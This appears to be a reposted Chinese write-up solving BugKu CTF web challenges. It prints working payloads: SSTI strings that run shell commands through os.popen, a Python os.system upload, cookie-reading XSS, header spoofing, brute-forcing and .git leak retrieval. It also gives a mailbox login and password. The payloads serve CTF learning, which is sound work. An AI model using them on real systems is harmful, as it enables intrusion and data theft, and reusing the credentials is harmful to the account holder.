BugKu:Web

• • Simple_SSTI_1
  • Flask_FileUpload
  • Simple_SSTI_2
  • 留言板
  • 矛盾
  • alert
  • 你必須讓他停下
  • 社工-初步收集
  • game1
  • 網站被黑
  • 本地管理員
  • bp
  • source
  • 源代碼

Simple_SSTI_1

1.根據題目提示使用flag構造參數，所以就是?flag={{XXXX}}

2.payload，查看config,得到flag

http://114.67.175.224:18349/?flag={{config}}

Flask_FileUpload

1.查看網頁源代碼，發現上傳的文件會通過Python 判斷是不是上傳的文件是不是jpg,png文件，并把執行的結果返回到，根據此編寫payload。

2.編寫python —payload,cat—查看目錄下的flag文件，并將文件保存為以jpg或png結尾的文件，上傳。

import os os.system('cat /flag')

3.顯示文件上傳成功，點擊F12查看，發現flag。

Simple_SSTI_2

1.在url后邊1輸入？falg,發現如下：
提示使用flag構造參數，所以就是?flag={{XXXX}}

2.查看config–
payload

?flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}}

得到如下文件目錄，如下圖

3.查看app bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var 目錄下的文件
payload

?flag={{config.__class__.__init__.__globals__['os'].popen('ls ../app').read()}}

4.在目錄app下看到flag，使用cat命令查看flag內容，路徑為…/app/flag
payload

?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}

留言板

1.使用dirsearch 掃描目錄,發現 目錄/admin.php

python dirsearch.py -u http://114.67.175.224:10454

2.使用工具爆破，發現用戶名為admin,密碼為011be4d65feac1a8

登錄進去，發現留言的語句，在該目錄顯示，顯示當前的cookie------<script>alert(document.cookie)</script>

javascript:alert(document.cookie) 可以查看當前頁的cookie

3.刷新http://114.67.175.224:10454/admin.php頁面，顯示flag

矛盾

數字繞過，num既不能是數字字符，但是要等于1，用科學計數法表示數字1，既不是純數字，其值又等于1因此，構造payload：num=1*e*0.1

alert

F12查看,發現unicode碼—通過解碼得到flag

你必須讓他停下

通過burpsuite抓包，得到頁面每一幀的數據包，查看源代碼發現flag

wp:查看頁面源代碼，抓包，發送到Repeater,不停的發送數據包，在10.jpg發現flag。

社工-初步收集

通過郵箱登錄，用戶名：bugkuku@163.com;密碼：XSLROCPMNWWZQDZL
進入郵箱，查找flag

game1

開始游戲后，抓包，結束后發現GET /score.php?score=25&ip=39.144.69.22&sign=zMMjU=== HTTP/1.1

發送到repeater,修改score=99999,99999base64編碼為OTk5OTk=，修改sign=zMOTk5OTk===
‘zM’+base64(score)+‘==’

網站被黑

目錄掃描發現shell.php

爆破登錄密碼發現flag

本地管理員

查看頁面源代碼發現base64編碼dGVzdDEyMw==，解碼得到test123，用戶名為admin,密碼為test123,登錄

發現IP禁止訪問，請聯系本地管理員登陸，IP已被記錄.

抓包發送到repeater,添加------X-Forwarded-For: 127.0.0.1，發送，發現flag

bp

登錄界面，爆破，使用bp

發現如下-----輸入正確的密碼，返回頁面的r將不是{code: ‘bugku10000’}

intrude—選項，添加{code: ‘bugku10000’}

開始爆破密碼—找到返回包不含有{code: ‘bugku10000’}的，為正確的密碼：zxc123

登錄—發現flag

source

文件題目提示–方向可能為源代碼泄露
1.目錄掃描–發現git目錄----git泄露–如下圖
使用工具dirsearch–命令python dirsearch.py -u http://114.67.175.224:12145/

2.kali使用 wget 命令:wget是Linux中的一個下載文件的工具,-r ：指定遞歸下載

wget -r http://114.67.175.224:12145/.git

下載完之后，生成114.67.175.224:12145文件夾，如下圖，進入到該目錄

cd 114.67.175.224:12145 ls 查看內容 git log 顯示提交日志 git reflog 顯示所有提交，包括孤立節點 查看內容 git show 40c6d51--發現flag

源代碼

查看題目源代碼–發現js代碼，以及url編碼的數據

<script> var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62'; var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b'; eval(unescape(p1) + unescape('%35%34%61%61%32' + p2)); </script>

將p1，‘%35%34%61%61%32’，p2，url解碼拼接,作為輸入–得到flag

p1url解碼

p2url解碼

'%35%34%61%61%32’解碼：54aa2
三段解碼拼接得到；67d709b2b54aa2aa648cf6e87a7114f1

function checkSubmit() {var a=document.getElementById("password"); if("undefined"!=typeof a) {if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value) return!0; alert("Error"); a.focus();return!1}} document.getElementById("levelQuest").onsubmit=checkSubmit;

總結

以上是生活随笔為你收集整理的BugKu:Web的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。